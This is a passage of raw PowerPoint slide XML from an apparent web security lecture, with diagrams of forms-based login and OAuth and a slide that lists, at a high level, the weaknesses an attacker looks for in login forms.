      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73735" name="Straight Connector 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7348538" y="4098608"/>
            <a:ext cx="823912" cy="823912"/>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type="triangle" w="lg" len="med"/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73736" name="Straight Arrow Connector 12"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6019800" y="4390708"/>
            <a:ext cx="2057400" cy="303212"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="med"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73737" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="5109845"/>
            <a:ext cx="800100" cy="269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Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73738" name="Straight Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="4084320"/>
            <a:ext cx="2667000" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="med"/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73739" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="3627120"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73740" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="3550920"/>
            <a:ext cx="1333500"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600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>User receives</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73741" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="4693920"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73742" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="4693920"/>
            <a:ext cx="1352550"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600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>User </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>submits form</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73743" name="Straight Connector 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="4465320"/>
            <a:ext cx="3352800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="lg" len="med"/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73744" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="4770120"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73745" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="4617720"/>
            <a:ext cx="1865313" cy="795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600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Processing code</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>validates username</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>and password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73747" name="Freeform 69"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="160338" y="3422333"/>
            <a:ext cx="1973262" cy="433387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 2592"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 240"/>
              <a:gd name="T2" fmla="*/ 0 w 2592"/>
              <a:gd name="T3" fmla="*/ 0 h 240"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 2592"/>
              <a:gd name="T5" fmla="*/ 0 h 240"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 2592"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 240"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2592"/>
              <a:gd name="T13" fmla="*/ 0 h 240"/>
              <a:gd name="T14" fmla="*/ 2592 w 2592"/>
              <a:gd name="T15" fmla="*/ 240 h 240"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="2592" h="240">
                <a:moveTo>
                  <a:pt x="570" y="240"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2592" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1529" y="240"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="2F7618"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="66FF33"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73748" name="Text Box 61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="1722120"/>
            <a:ext cx="6629400" cy="579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3200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>How all the pieces fit together</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73749" name="Curved Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5257800" y="3322320"/>
            <a:ext cx="1981200" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73750" name="Curved Connector 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6019800" y="3322320"/>
            <a:ext cx="1219200" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73751" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010400" y="2712720"/>
            <a:ext cx="1905000" cy="1019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600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>These items may be part of the same page or two </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>different pages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73752" name="Picture 2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3835083"/>
            <a:ext cx="1371600" cy="2535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605206AB-0267-4CCA-AB8B-44ECF79FFB98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="118107" y="1794560"/>
            <a:ext cx="2244093" cy="163444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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s Perspective of Forms-based Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74755" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1615440"/>
            <a:ext cx="8686800" cy="4038600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Only as secure as the developer makes it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Or the underlying development environment, provided that the developer doesn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t break or inadvertently circumvent its security measures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Account lockout typically doesn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Check for injection vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>XSS to redirect users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Capturing the authentication token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Others …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Spoofing the site is possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Phishing attacks are an example of this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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="980808"/>
            <a:ext cx="8686800" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OAuth doesn't actually authenticate users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It delegates access to third-parties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Designed to avoid giving your password to third-parties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often used by social media clients for access to Twitter, Facebook, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Three parties to an oAuth transaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user:  Us</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The consumer:  Twitteriffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The service provider:  Twitter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32352386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OAuth Works - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Part 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3977090" y="5429250"/>
            <a:ext cx="944489" cy="443198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Consumer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6715908" y="2715419"/>
            <a:ext cx="1399392" cy="500137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Twitter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Service Provider</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1403450" y="2748757"/>
            <a:ext cx="526857" cy="500137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Bob</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2331542" y="1904036"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1825256" y="4526502"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4702083" y="3248895"/>
            <a:ext cx="2013825" cy="1319930"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
